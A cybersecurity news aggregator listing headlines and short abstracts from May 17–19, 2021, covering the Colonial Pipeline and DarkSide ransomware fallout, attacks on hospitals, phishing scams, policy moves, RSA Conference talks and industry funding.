Abstract Styra's Series B round of funding led by Battery Ventures. Also participating are previous backers A. Capital, Unusual Ventures and Accel; and new backers CapitalOne Ventures and Citi Ventures.

TechCrunch

May 19, 2021 – Ransomware

Ransomware Attackers Target New Zealand District Hospitals, Causing Outages and Surgery Canellations Full Text

Abstract New Zealand's Waikato District Health Board (DHB) has been hit with a ransomware that took down most IT services Tuesday morning and drastically reduced services at six of its affiliate hospitals.

The Register

May 19, 2021 – Business

ThreatLocker raises $20M to secure enterprise endpoints Full Text

Abstract ThreatLocker, a startup providing enterprise cybersecurity tools for servers and endpoints, today announced it has raised $20 million in a series B round led by Elephant.

Venture Beat

May 19, 2021 – Hacker

Colonial Pipeline Hackers Received $90 million in Bitcoin from Multiple Victims Before Shutting Down Full Text

Abstract DarkSide, the group behind the recent Colonial Pipeline ransomware attack, received a total of $90 million in bitcoin ransom payments before shutting down last week, according to fresh research.

NBC News

May 19, 2021 – Phishing

Scammers Impersonating Windows Defender to Push Malicious Windows Apps | McAfee Blogs Full Text

Abstract Cybercriminals are increasingly using Windows Push Notifications to impersonate legitimate alerts. Recent campaigns pose as a Windows Defender Update to target user and system information.

McAfee

May 19, 2021 – Phishing

Payment App Scammers: Stay Aware and Learn to Avoid Them Full Text

Abstract While it is convenient and becoming more popular to use virtual wallets like Venmo, PayPal, and Cash App, there is a risk of potentially being scammed by someone who isn't who they say they are.

Binary Defense

May 19, 2021 – Ransomware

MountLocker ransomware uses Windows API to worm through networks Full Text

Abstract The MountLocker ransomware operation now uses enterprise Windows Active Directory APIs to worm through networks.

BleepingComputer

May 19, 2021 – Ransomware

DarkSide ransomware made $90 million since October 2020 Full Text

Abstract Researchers from blockchain analysis firm Elliptic estimated that Darkside ransomware gang has made over $90 million from its attacks. Experts from blockchain analysis firm Elliptic estimated that the Darkside ransomware gang has earned over $90 million...

Security Affairs

May 18, 2021 – General

Hillicon Valley: Democrats urge Facebook to abandon ‘Instagram for kids’ plan | ‘Homework gap’ likely to persist after pandemic Full Text

Abstract A group of congressional Democrats on Tuesday called on Facebook to abandon a plan to create an Instagram for kids platform, further amplifying criticism of the plan. Meanwhile, advocates are expressing concerns that the “homework gap” created by digital learning during the COVID-19 pandemic may continue once students return to in-person classes, and Colonial Pipeline said it was experiencing some technical issues a week after service resumed after a devastating ransomware attack. 

The Hill

May 18, 2021 – General

#RSAC: Solving the Ransomware Scourge Requires a Coordinated Effort Full Text

Abstract What is the current state of ransomware and what needs to be done to stop it? A panel of experts at the RSA Conference has a few ideas

Infosecurity Magazine

May 18, 2021 – Policy and Law

Legislation to secure critical systems against cyberattacks moves forward in the House Full Text

Abstract Multiple bills meant to secure critical infrastructure against cyber threats were approved by the House Homeland Security Committee on Tuesday afternoon, just a week after a ransomware attack on the Colonial Pipeline caused fuel shortages across the nation. 

The Hill

May 18, 2021 – Breach

‘How would I feel if that was posted in Times Square?’ Lawyers warn to watch what you say about breaches Full Text

Abstract Law firm partner advises RSA Conference attendees to practice “communication hygiene” when emailing or messaging.

SCMagazine

May 18, 2021 – Phishing

Scammers Pose as Meal-Kit Services to Steal Customer Data Full Text

Abstract Attackers are sending messages disguised as offers from meal-kit services, like HelloFresh.

Threatpost

May 18, 2021 – Government

Lawmakers press Biden to create plan to secure economy after Colonial Pipeline attack Full Text

Abstract The bipartisan leaders of the House Homeland Security Committee on Tuesday urged President Biden to ensure there is a plan in place to ensure the nation’s economy is not disrupted by a major cyberattack.

The Hill

May 18, 2021 – Solution

Chrome now automatically fixes breached passwords on Android Full Text

Abstract Google is rolling out a new Chrome on Android feature to help users change passwords leaked online following data breaches with a single tap.

BleepingComputer

May 18, 2021 – General

#RSAC: Does the US Need a National Breach Reporting Law? Full Text

Abstract Panelists at the RSA Conference 2021, including the FBI and US Department of Justice, make a case for a national standard for data breach reporting

Infosecurity Magazine

May 18, 2021 – Solution

Mozilla starts rolling out Site Isolation to all Firefox channels Full Text

Abstract Mozilla has started rolling out the Site Isolation security feature to all Firefox channels, now also protecting users in the Beta and Release channels from attacks launched via malicious websites.

BleepingComputer

May 18, 2021 – Government

#RSAC: Anne Neuberger Sets Out Biden Administration’s Plan to Modernize US Cyber-defenses Full Text

Abstract Anne Neuberger outlines three areas of focus for the Biden administration to enhance the US's cybersecurity

Infosecurity Magazine

May 18, 2021 – Malware

Stalkerware Apps Riddled with Security Bugs Full Text

Abstract Attackers can take advantage of the fact these apps access, gather, store and transmit more information than any other app their victims have installed.

Threatpost

May 18, 2021 – Ransomware

Analysis of NoCry ransomware: A variant of the Judge ransomware Full Text

Abstract The NoCry ransomware, which is very similar to Judge, creates a mutex to prevent multiple instances from running in parallel, provides sandbox detection, and deletes system restore points.

Security Affairs

May 18, 2021 – Government

Japan to restrict private sector use of foreign equipment and tech: Report Full Text

Abstract The Japanese government will reportedly introduce new regulations across 44 sectors to bolster national cyber defence, partly in response to the Colonial Pipeline hack that occurred last week.

ZDNet

May 18, 2021 – Policy and Law

European Council extends sanctions against foreign threat actors Full Text

Abstract European Council extended for one year the sanctions against foreign threat actors that threaten the European Union and its member states. The European Council announced that it will extend for one year the framework for sanctions against threat actors...

Security Affairs

May 18, 2021 – Hacker

Try This One Weird Trick Russian Hackers Hate – Krebs on Security Full Text

Abstract Digital extortion gangs like DarkSide take great care to make their entire platforms geopolitical, because their malware is engineered to work only in certain parts of the world.

Krebs on Security

May 18, 2021 – Government

Biden Administration Plans to Spend Billions in Cybersecurity Funding to Protect Critical Infrastructure Full Text

Abstract The Biden administration on Tuesday detailed how it wants to fund efforts to counter a wave of massive hacks in the wake of this month’s Colonial Pipeline ransomware attack.

Reuters

May 18, 2021 – Attack

Colonial Pipeline servers experiencing ‘intermittent disruptions’ days after ransomware attack Full Text

Abstract Colonial Pipeline announced Tuesday that its internal servers were experiencing “intermittent disruptions," but stressed the problem was separate from the devastating ransomware attack that disrupted operations earlier this month.

The Hill

May 18, 2021 – Business

Eldorado-based Shared Assessments acquired by national company OneTrust Full Text

Abstract Eldorado-based cybersecurity firm Shared Assessments has been acquired for an undisclosed price by one of its member organizations, OneTrust, at one time the fastest-growing company on the Inc. 5000.

Yahoo! Finance

May 18, 2021 – General

Attention CEOs: No news can be good news when investigating a breach Full Text

Abstract David Estlick, CISO of Chipotle Mexican Grill joined James Christiansen, vice president and CSO of cloud security transformation at Netskope, to speak about managing corporate expectation post breach.

SCMagazine

May 18, 2021 – Phishing

FBI receives record level of complaints for online scams, investment fraud Full Text

Abstract The FBI says that complaints concerning online scams and investment fraud have now reached a record-breaking level. The FBI's IC3 received its six millionth complaint on May 15, 2021.

ZDNet

May 18, 2021 – General

#RSAC: McAfee CTO Calls for Risk Decisions Based on Science Not Headlines Full Text

Abstract McAfee senior vice president and CTO, Steve Grobman, took to the virtual stage at RSA Conference on May 18 with a call to action: reconsider the perception of risk by looking at data, not headlines

Infosecurity Magazine

May 18, 2021 – Ransomware

DarkSide ransomware made $90 million in just nine months Full Text

Abstract The DarkSide ransomware gang has collected at least $90 million in ransoms paid by its victims over the past nine months to multiple Bitcoin wallets.

BleepingComputer

May 18, 2021 – Botnet

Discovery of Simps Botnet Reveals Ties to Keksec Hacker Group Full Text

Abstract Simps botnet binary uses Mirai and Gafgyt modules for DDOS functionality. The botnet might be in the early stages of development because of the presence of the infected.log file after execution.

Security Affairs

May 18, 2021 – General

FBI says cybercrime complaints more than doubled in 14 months Full Text

Abstract The FBI's Internet Crime Complaint Center (IC3) has seen a massive 100% in cybercrime complaints over the past 14 months.

BleepingComputer

May 18, 2021 – Vulnerabilities

Commercial third party code creating security blind spots Full Text

Abstract Despite the fact that third party code in IoT projects has grown 17% in the past five years, only 56% of OEMs have formal policies for testing security, a VDC Research reveals.

Help Net Security

May 18, 2021 – General

It’s Time to Prepare for a Rise in Insider Threats Full Text

Abstract Anurag Kahol, CTO at Bitglass, discusses options for detecting malicious or dangerous activity from within an organization.

Threatpost

May 18, 2021 – General

Over $80 million lost to cryptocurrency investment scams since October Full Text

Abstract The US Federal Trade Commission (FTC) says that over $80 million were lost to cryptocurrency investment scams, according to roughly 7,000 reports received since October 2020.

BleepingComputer

May 18, 2021 – Hacker

Researchers Discover Attackers Obfuscating IP Addresses Inside AWS Using Amazon VPC Service Full Text

Abstract Security researchers have documented an attack technique that may allow attackers to leverage a legitimate Amazon VPC feature to mask their use of stolen API credentials inside AWS.

Help Net Security

May 18, 2021 – Denial Of Service

Q1 2021 Sees 2.9 Million DDoS Attacks Launched Full Text

Abstract DDoS attacks in Q1 2021 up 31% YoY, according to new research

Infosecurity Magazine

May 18, 2021 – Attack

‘Flattered’ Russian spy chief denies SolarWinds attack Full Text

Abstract The United States and Britain have blamed Russia’s Foreign Intelligence Service (SVR), for the hack which compromised nine U.S. federal agencies and hundreds of private sector companies.

Reuters

May 18, 2021 – Policy and Law

Oregonian Indicted Over International Streaming Fraud Full Text

Abstract AccountBot suspect allegedly stole and resold millions of customers’ login credentials

Infosecurity Magazine

May 18, 2021 – Ransomware

Double-extortion ransomware attacks on the rise Full Text

Abstract As the rewards that result from this type of crime increase, risks to government entities, company bottom lines, reputation, data integrity, customer confidence, and business continuity also grow.

Help Net Security

May 18, 2021 – Ransomware

Unsuccessful Conti Ransomware Attack Still Packs Costly Punch Full Text

Abstract Separate attacks last week on the country’s Department of Health and Health Service Executive forced the shutdown of networks and services that still haven’t been fully restored.

Threatpost

May 18, 2021 – Business

IBM to Acquire Waeg Full Text

Abstract Deal to acquire European Salesforce Consulting Partner expected to close this quarter

Infosecurity Magazine

May 18, 2021 – Privacy

How Apple Gave Chinese Government Access to iCloud Data and Censored Apps Full Text

Abstract In July 2018, when Guizhou-Cloud Big Data (GCBD)  agreed to a deal  with state-owned telco China Telecom to move users' iCloud data belonging to Apple's China-based users to the latter's servers, the shift raised concerns that it could make user data vulnerable to state surveillance. Now, according to a  deep-dive report  from The New York Times, Apple's privacy and security concessions have "made it nearly impossible for the company to stop the Chinese government from gaining access to the emails, photos, documents, contacts and locations of millions of Chinese residents." The revelations stand in stark contrast to Apple's commitment to privacy, while also highlighting a pattern of  conceding  to the  demands  of the Chinese government in order to continue its operations in the country. Apple, in 2018, announced iCloud data of users in mainland China would move to a new data center in Guizhou province as part of a partnership with GCBD. The transitio

The Hacker News

May 18, 2021 – Hacker

A Deep Dive Into DarkSide Operations Full Text

Abstract The Colonial Pipeline, which carries fuel along a path of 5,500 miles all the way from Texas to New Jersey, was hacked by DarkSide ransomware operators. This ended up being the largest impact on the U.S. energy system from a cyberattack.

Cyware Alerts - Hacker News

May 18, 2021 – Government

Russian spy chief denies responsibility for SolarWinds hack Full Text

Abstract Russia’s spy chief is denying that his country is responsible for the cyberattack on IT group SolarWinds.

The Hill

May 18, 2021 – General

Free “vCISO Clinic” offers Resource-Constrained InfoSec Leaders a Helping Hand Full Text

Abstract Leaders in the InfoSec field face a strange dilemma. On the one hand, there are hundreds of thousands of resources available to find online to read (or watch) if they have questions – that's a benefit of a digital-first field. On the other hand, most leaders face challenges that – while not entirely unique each time – tend to require a specific touch or solution. For most, it would be great to have a sympathetic ear or a fresh perspective that has faced similar challenges. Where does the tip of the spear turn to for a helping hand? One popular avenue is to turn to a virtual CISO (or vCISO), an external consultant who can offer strategic advice, suggestions and help find insights that can be instrumental in building better security systems. For many organizations, having the benefits of a CISO, even on a temporary basis, can be incredibly helpful and valuable. With that in mind, Chris Roberts, Cynet's chief security strategist, is offering a new program ( you can learn more

The Hacker News

May 18, 2021 – Phishing

Consumers Warned About Surge in Meal Kit Delivery Scams Full Text

Abstract Fraudsters are increasingly impersonating meal kit delivery companies like Gousto

Infosecurity Magazine

May 18, 2021 – Ransomware

Analysis of NoCry ransomware: A variant of the Judge ransomware Full Text

Abstract Researchers at Tesorion released a decryptor for Judge ransomware that also decrypts files encrypted by the NoCry ransomware. In January this year, we published a blog post on our analysis of the Judge ransomware. We announced a free decryptor...

Security Affairs

May 18, 2021 – General

Verdict is in: Forward-thinking security controls prepared Jersey Courts for COVID Full Text

Abstract Jack McCarthy, CIO of the New Jersey Judiciary Court System, was on the golf course last March when he received a call from Jersey’s chief justice saying the courts would be shut down due to the pandemic. This immediately kicked off a sweeping business continuity and work-from-home initiative that emphasized user and data security.

SCMagazine

May 18, 2021 – General

Microsoft, Adobe Exploits Top List of Crooks’ Wish List Full Text

Abstract You can’t possibly patch all CVEs, so focus on the exploits crooks are willing to pay for, as tracked in a study of the underground exploit market.

Threatpost

May 18, 2021 – Ransomware

Newly Discovered Function in DarkSide Ransomware Variant Targets Disk Partitions Full Text

Abstract At the time of discovery, FortiGuard Labs researchers believed the ransomware was seeking out partitions to find possible hidden partitions setup by systems administrators to hide backup files.

Fortinet

May 18, 2021 – General

Experts Reveal Over 150 Ways to Steal Control of 58 Android Stalkerware Apps Full Text

Abstract A total of 158 privacy and security issues have been identified in 58 Android stalkware apps from various vendors that could enable a malicious actor to take control of a victim's device, hijack a stalker's account, intercept data, achieve remote code execution, and even frame the victim by uploading fabricated evidence. The new findings, which come from an analysis of 86 stalkerware apps for the Android platform undertaken by Slovak cybersecurity firm ESET, highlight the unintended consequences of a practice that's not only unethical but in the process could also expose private and intimate information of the victims and leave them at risk of cyberattacks and fraud. "Since there could be a close relationship between stalker and victim, the stalker's private information could also be exposed," ESET researcher Lukas Stefanko  said  in a Monday write-up. "During our research, we identified that some stalkerware keeps information about the stalkers using

The Hacker News

May 18, 2021 – Phishing

Families of Missing Persons Receive Fake Ransom Demands Full Text

Abstract FBI warns that extortion scams are increasing

Infosecurity Magazine

May 18, 2021 – Ransomware

Breaking Down the Ransomware Trends in 2021 Full Text

Abstract It is to be expected that threat actors are not going to keep up their end of the bargain, even after paying the ransom. All or some part of the exfiltrated data has ended up online even after payment.

Cyware Alerts - Hacker News

May 18, 2021 – Attack

70 European and South American Banks Under Attack By Bizarro Banking Malware Full Text

Abstract A financially motivated cybercrime gang has unleashed a previously undocumented banking trojan, which can steal credentials from customers of 70 banks located in various European and South American countries. Dubbed " Bizarro " by Kaspersky researchers, the Windows malware is "using affiliates or recruiting money mules to operationalize their attacks, cashing out or simply to helping [sic] with transfers." The campaign consists of multiple moving parts, chief among them being the ability to trick users into entering two-factor authentication codes in fake pop-up windows that are then sent to the attackers, as well as its reliance on social engineering lures to convince visitors of banking websites into downloading a malicious smartphone app. Bizarro, which uses compromised WordPress, Amazon, and Azure servers to host the malware, is distributed via MSI packages downloaded by victims from sketchy links in spam emails. Launching the package downloads a ZIP archiv

The Hacker News

May 18, 2021 – General

NCSC Renews Bid to Improve Diversity and Inclusion in Cyber Full Text

Abstract Second annual survey will seek out areas for improvement

Infosecurity Magazine

May 18, 2021 – Policy and Law

2 Bills Introduced in Wake of Colonial Pipeline Attack Full Text

Abstract The ransomware attack on Colonial Pipeline Co. earlier this month has prompted lawmakers to introduce measures designed to address cybersecurity shortcomings in the nation's critical infrastructure.

Gov Info Security

May 18, 2021 – Ransomware

AXA Faces DDoS After Ransomware Attack Full Text

Abstract Avaddon group warns of more damage ahead

Infosecurity Magazine

May 18, 2021 – Phishing

Threat Actors Target South Korean and Aussie Users with Malicious Emails Disguised as Accounting Ledgers Full Text

Abstract Out of this, 98.34 percent of the attacks appear to have originated from IP addresses in Bangladesh, with 76.08% of targeted users in South Korea, 17% in Australia, and 1% in the US.

Bitdefender

May 18, 2021 – Ransomware

Irish health service may take weeks to recover from ransomware attack Full Text

Abstract “While it may take weeks to get all systems back, steady progress is being made, starting with services for the most urgent patients,” Health Minister Stephen Donnelly said on Twitter.

Reuters

May 18, 2021 – Botnet

Discovery of Simps Botnet Leads To Ties to Keksec Group Full Text

Abstract Uptycs' threat research team discovered a new botnet, tracked as Simps botnet, attributed to Keksec group, which is focused on DDOS activities Uptycs' threat research team has discovered a new Botnet named ‘Simps’ attributed to Keksec group primarily...

Security Affairs

May 18, 2021 – Vulnerabilities

Object Injection Vulnerability Affects WordPress Versions 3.7 to 5.7.1 Full Text

Abstract There would need to be at least an additional vulnerability in another software component in place on the website – or an active compromise already taking place – for this to be an attack vector.

Sucuri

May 18, 2021 – Breach

Codecov hackers gained access to Monday.com source code Full Text

Abstract Monday.com has recently disclosed the impact of the Codecov supply-chain attack that affected multiple companies. As reported by BleepingComputer last month, popular code coverage tool Codecov had been a victim of a supply-chain attack that lasted for two months.

BleepingComputer

May 18, 2021 – Malware

Bizarro banking Trojan targets banks in Brazil and abroad Full Text

Abstract Bizarro is a new sophisticated Brazilian banking trojan that is targeting customers of tens of banks in Europe and South America. Researchers from Kaspersky have spotted a new sophisticated Brazilian banking trojan dubbed Bizarro that is targeting...

Security Affairs

May 18, 2021 – Ransomware

Lorenz: A New Ransomware Making Rounds Full Text

Abstract A ransomware gang that began operating a month ago and shares similarity with ThunderCrypt operation has launched a double-extortion attack on its victims. Security agencies and professionals need to keep an eye on this threat and beef up defenses.

Cyware Alerts - Hacker News

May 18, 2021 – Malware

Magecart Hackers Spreading Malicious PHP Web Shells Full Text

Abstract A Magecart Group continues to distribute new malware wherein attackers hide the PHP-based web shell malware—masked as a favicon—into the targeted sites. The cybercrime syndicate is intensifying its efforts to compromise online stores with a wide range of attack vectors.

Cyware Alerts - Hacker News

May 18, 2021 – General

#RSAC: Bruce Schneier Warns of the Coming AI Hackers Full Text

Abstract AI hacking has the potential to reshape the cybersecurity landscape for good or for evil, Schneier warns in a grim RSA Conference keynote

Infosecurity Magazine

May 18, 2021 – Disinformation

#RSAC: The Invisible War of Internet Misinformation Full Text

Abstract RSA Conference keynoter Theresa Payton outlines how misinformation works and what organizations can do to help combat it

Infosecurity Magazine

May 17, 2021 – Breach

Student health insurance carrier Guard.me suffers a data breach Full Text

Abstract Student health insurance carrier guard.me has taken their website offline after a vulnerability allowed a threat actor to access policyholders' personal information.

BleepingComputer

May 17, 2021 – General

56% of security managers say today’s cyber workforce lacks soft skills Full Text

Abstract “We look for people with the right attitude, people who can be dynamic, and are eager to better themselves and eager to learn,” said Gregory Touhill of the Software Engineering Institute, during a panel at the RSA Conference. Unfortunately, those skills can be tough to come by.

SCMagazine

May 17, 2021 – Ransomware

Conti ransomware also targeted Ireland’s Department of Health Full Text

Abstract The Conti ransomware gang failed to encrypt the systems of Ireland's Department of Health (DoH) despite breaching its network and dropping Cobalt Strike beacons to deploy their malware across the network.

BleepingComputer

May 17, 2021 – Skimming

Magecart Goes Server-Side in Latest Tactics Changeup Full Text

Abstract The latest Magecart iteration is finding success with a new PHP web shell skimmer.

Threatpost

May 17, 2021 – General

Hillicon Valley: Parler’s return to Apple store poses new challenges | Biden revokes Trump-era order targeting shield for website operators Full Text

Abstract Parler is relaunching in the Apple App Store, with some additional content moderation policies in place for the new version of the controversial social media platform available for iPhones and iPads. A subsidiary group of a French Insurance giant was hit by a ransomware attack that impacted operations across Asia. Meanwhile, President BidenJoe Biden28 Senate Democrats sign statement urging Israel-Hamas ceasefire Franklin Graham says Trump comeback would 'be a very tough thing to do' Schools face new pressures to reopen for in-person learning MORE revoked a Trump-era order that targeted a controversial law that protects tech companies from liability for content posted by third parties. 

The Hill

May 17, 2021 – General

Cyberattacks against critical infrastructure organizations spotlight an IT, OT cultural divide Full Text

Abstract Security teams that support IT and OT often find themselves at odds in terms of priorities and incident response tactics, heightening the risk that emerges as these two environments converge. Gamification is one tactic that help address conflict.

SCMagazine

May 17, 2021 – Ransomware

Ransomware victim shows why transparency in attacks matters Full Text

Abstract As devastating ransomware attacks continue to have far-reaching consequences, companies still try to hide the attacks rather than be transparent. Below we highlight a company's response to an attack that should be used as a model for all future disclosures.

BleepingComputer

May 17, 2021 – General

What a Year It’s Been: RSA 2021 Embraces ‘Resilience’ Full Text

Abstract Keynoters from Cisco, Netflix and RSA highlighted lessons from the last year, and cybersecurity’s new mandate in the post-pandemic world: Bounce back stronger.

Threatpost

May 17, 2021 – Phishing

FBI spots spear-phishing posing as Truist Bank bank to deliver malware Full Text

Abstract Threat actors impersonated Truist, the sixth-largest U.S. bank holding company, in a spear-phishing campaign attempting to infect recipients with what looks like remote access trojan (RAT) malware.

BleepingComputer

May 17, 2021 – Criminals

FIN7: Active Again with New Lizar Backdoor Full Text

Abstract The notorious cybercrime gang behind the Carbanak RAT is spreading a backdoor called Lizar under the guise of a Windows pen-testing tool for ethical hackers. Experts say the group may be planning to further sharpen its tools and techniques to make its attacks stealthier and more effective.

Cyware Alerts - Hacker News

May 17, 2021 – Criminals

Transparent Tribe Reappears with Expanded Malware Arsenal and TTPs Full Text

Abstract APT36 was found creating fake domains to impersonate military and defense firms and disseminate malware-laced documents to infect victims with ObliqueRAT and CrimsonRAT. Organizations are recommended to stay vigilant and implement adequate security measures proactively.

Cyware Alerts - Hacker News

May 17, 2021 – Attack

AXA insurance subsidiary group hit by ransomware attack in multiple Asian countries Full Text

Abstract A subsidiary group of French insurance giant AXA was hit by a ransomware attack last week that negatively impacted operations in multiple Asian countries.

The Hill

May 17, 2021 – Attack

FragAttacks: Affecting Millions of Wi-Fi Enabled Devices Full Text

Abstract A total of 12 design and implementation flaws in IEEE 802.11 technical standards leave all WiFi devices vulnerable to attacks. These flaws can be exploited by attackers within the radio range of the target.

Cyware Alerts - Hacker News

May 17, 2021 – General

#RSAC: RSA CEO Details the Challenges of Resilience in a World of Chaos Full Text

Abstract RSA CEO Rohit Ghai kicks off the annual RSA Security conference with an inspirational keynote defining what resilience is really all about.

Infosecurity Magazine

May 17, 2021 – General

#RSAC: Netflix Exec Explains Where Infosec Pros are Going Wrong Full Text

Abstract There are several hard truths that need to be addressed in the industry

Infosecurity Magazine

May 17, 2021 – General

Cisco and Netflix execs: The pandemic brought good, and some bad changes in security standards Full Text

Abstract Two executives mull on changes – big and small – to the business security environment in the wake of COVID.

SCMagazine

May 17, 2021 – Government

UK govt seeks advice on defending against supply-chain cyberattacks Full Text

Abstract Today, the UK government has announced a call for advice on defending against software supply-chain attacks and ways to strengthen IT Managed Service Providers (MSPs) across the country. The move comes after last week when President Biden had issued an executive order to increase cybersecurity defenses across the U.S.

BleepingComputer

May 17, 2021 – General

Cyber investigations, threat hunting and research: More art than science Full Text

Abstract Defenders need to be 100% perfect at protecting 100% of the countless entry points 100% of the time in order to prevent breaches, while on the other hand, hackers only need one exploit that works.

Help Net Security

May 17, 2021 – Malware

Android stalkerware, a danger for victims and stalkers Full Text

Abstract ESET research shows that Android stalkerware apps are affected by vulnerabilities that further threaten victims. ESET research reveals that common Android stalkerware apps are affected with vulnerabilities that could expose the privacy and security...

Security Affairs

May 17, 2021 – Phishing

FBI warns of scammers targeting families of missing persons Full Text

Abstract The Federal Bureau of Investigation (FBI) warned that scammers actively target the vulnerable families of missing persons attempting to extort them using information shared on social media.

BleepingComputer

May 17, 2021 – Policy and Law

Deputy US Marshal Allegedly Framed Ex as Cyber-stalker Full Text

Abstract Cyber-stalking and perjury charges for deputy US marshal accused of framing his former girlfriend

Infosecurity Magazine

May 17, 2021 – Vulnerabilities

PoC released for wormable Windows IIS bug Full Text

Abstract Several security researchers and security firms who reviewed last week’s security updates considered the bug the most dangerous vulnerability Microsoft fixed in this month’s patch cycle.

The Record

May 17, 2021 – General

Miss Universe Speaks Out Against Cyber-bullying Full Text

Abstract Competition delegates share cyber-bullying experiences on video

Infosecurity Magazine

May 17, 2021 – Malware

Bizarro Banking Trojan Sports Sophisticated Backdoor Full Text

Abstract The advanced Brazilian malware has gone global, harvesting bank logins from Android mobile users.

Threatpost

May 17, 2021 – General

CISOs Struggle to Cope with Mounting Job Stress Full Text

Abstract Pandemic and evolving IT demands are having a major, negative impact on CISO’s mental health, a survey found.

Threatpost

May 17, 2021 – General

85% of breaches involve the human element Full Text

Abstract With an unprecedented number of people working remotely, phishing and ransomware attacks increased by 11 percent and 6 percent respectively, with instances of misrepresentation increasing by 15 times.

Help Net Security

May 17, 2021 – General

Two-thirds of CISOs Unprepared for Cyber-attack Full Text

Abstract Proofpoint’s "Voice of the CISO 2021 Report" reveals lack of attack-readiness

Infosecurity Magazine

May 17, 2021 – Business

Cisco Plans to Acquire Kenna Security, Boost Security Offerings Full Text

Abstract Cisco Systems (CSCO) plans to acquire privately-held California-based Kenna Security in a bid to enhance its security offerings. However, the financial terms of the deal were not disclosed.

Yahoo! Finance

May 17, 2021 – Ransomware

Three Ransomware Sites Go Dark and Three Major Hacking Forums Ban Ransomware Ads Full Text

Abstract Three hacking forums have now banned ransomware ads, three ransomware leak sites have gone down, and two other ransomware groups have announced plans to stop operating in public and go “private.”

The Record

May 17, 2021 – Government

UK Government May Force MSPs to Follow Security Standards Full Text

Abstract The DCMS has requested views on its proposals

Infosecurity Magazine

May 17, 2021 – Vulnerabilities

Exploit released for wormable Windows HTTP vulnerability Full Text

Abstract Proof-of-concept exploit code has been released over the weekend for a critical wormable vulnerability in the latest Windows 10 and Windows Server versions.

BleepingComputer

May 17, 2021 – Attack

Bizarro Banking Trojan Expands its Attacks to 70 Banks From European and South American Countries Full Text

Abstract Bizarro has x64 modules and is able to trick users into entering two-factor authentication codes in fake pop-ups. It may also use social engineering to convince victims to download a smartphone app.

Kaspersky Labs

May 17, 2021 – Breach

Student names, vendor bank account info exposed in Buffalo Public Schools cyberattack Full Text

Abstract Personal information about an unknown number of students, parents, and employees has been exposed, along with bank account information for an unknown number of vendors, the district revealed recently.

Buffalo News

May 17, 2021 – Vulnerabilities

Apple’s Find My Network Can be Abused to Exfiltrate Data From Nearby Devices Full Text

Abstract Latest research has demonstrated a new exploit that enables arbitrary data to be uploaded from devices that are not connected to the Internet by simply sending "Find My Bluetooth" broadcasts to nearby Apple devices. "It's possible to upload arbitrary data from non-internet-connected devices by sending Find My [Bluetooth Low Energy] broadcasts to nearby Apple devices that then upload the data for you," Positive Security researcher Fabian Bräunlein  said  in a technical write-up disclosed last week. "Being inherent to the privacy and security-focused design of the Find My Offline Finding system, it seems unlikely that this misuse can be prevented completely." The study builds on a previous study by TU Darmstadt  published  in March 2021, which disclosed two distinct design and implementation flaws in Apple's crowdsourced Bluetooth location tracking system that could lead to a location correlation attack and unauthorized access to a user's lo

The Hacker News

May 17, 2021 – Policy and Law

Brazilian gang defrauds Uber, Lyft, DoorDash using GPS spoofing and stolen IDs Full Text

Abstract US authorities have charged a gang of Brazilian nationals for a scheme that defrauded the customers of services like Uber, Lyft, DoorDash, and two other unidentified food delivery services.

The Record

May 17, 2021 – General

Why Password Hygiene Needs a Reboot Full Text

Abstract In today's digital world, password security is more important than ever. While biometrics, one-time passwords (OTP), and other emerging forms of authentication are often touted as replacements to the traditional password, today, this concept is more marketing hype than anything else. But just because  passwords aren't going anywhere anytime soon  doesn't mean that organizations don't need to modernize their approach to password hygiene right now.  The Compromised Credential Crisis As Microsoft's  security team put it , "All it takes is one compromised credential…to cause a data breach." Coupled with the rampant problem of password reuse, compromised passwords can have a significant and long-lasting impact on enterprise security. In fact, researchers from Virginia Tech University found that over 70% of users employed a compromised password for other accounts up to a year after it was initially leaked, with 40% reusing passwords that were leaked over three years ago. Wh

The Hacker News

May 17, 2021 – Business

Cisco Snaps Up Kenna Security for Vulnerability Management Full Text

Abstract New capabilities will boost SecureX platform

Infosecurity Magazine

May 17, 2021 – Vulnerabilities

Expert released PoC exploit code for Windows CVE-2021-31166 bug Full Text

Abstract A security researcher has published a working proof-of-concept exploit code for a wormable Windows IIS server vulnerability tracked as CVE-2021-31166. Microsoft Patch Tuesday for May 2021 security updates addressed 55 vulnerabilities in Microsoft...

Security Affairs

May 17, 2021 – Ransomware

Update: Conti ransomware demanded $20M ransom to Ireland Health Service Executive Full Text

Abstract The incident caused cancellations and disruption to services at multiple hospitals in the country, fortunately, the ongoing coronavirus vaccination campaign was not affected.

Security Affairs

May 17, 2021 – Malware

Experts Warn About Ongoing AutoHotkey-Based Malware Attacks Full Text

Abstract Cybersecurity researchers have uncovered an ongoing malware campaign that heavily relies on AutoHotkey (AHK) scripting language to deliver multiple remote access trojans (RAT) such as Revenge RAT, LimeRAT, AsyncRAT, Houdini, and Vjw0rm on target Windows systems. At least four different versions of the campaign have been spotted starting February 2021, according to researchers from Morphisec Labs. "The RAT delivery campaign starts from an AutoHotKey (AHK) compiled script," the researchers  noted . "This is a standalone executable that contains the following: the AHK interpreter, the AHK script, and any files it has incorporated via the  FileInstall  command. In this campaign, the attackers incorporate malicious scripts/executables alongside a legitimate application to disguise their intentions." AutoHotkey is an open-source custom scripting language for Microsoft Windows that's meant to provide easy hotkeys for macro-creation and software automation, enablin

The Hacker News

May 17, 2021 – Ransomware

Cybercrime Forum Bans Ransomware Activity Full Text

Abstract XSS complains of “too much PR” from recent incidents

Infosecurity Magazine

May 17, 2021 – Business

Bitcoin down: 51% attack? No, put the blame on Elon Musk Full Text

Abstract The price of Bitcoin falls after Elon Musk declared that its company, Tesla, may have sold holdings of the cryptocurrency We have a long-debated about the possibility that the Bitcoin price could be influenced by threat actors through 51% attacks,...

Security Affairs

May 17, 2021 – Ransomware

The new digital extortion Full Text

Abstract Payments to ransomware attackers rose 337% from 2019 to 2020, reaching more than $400 million worth of cryptocurrency, according to figures just released by Chainalysis, a blockchain analysis company.

Axios

May 17, 2021 – Ransomware

U.S. Pipeline Ransomware Attackers Go Dark After Servers and Bitcoin Are Seized Full Text

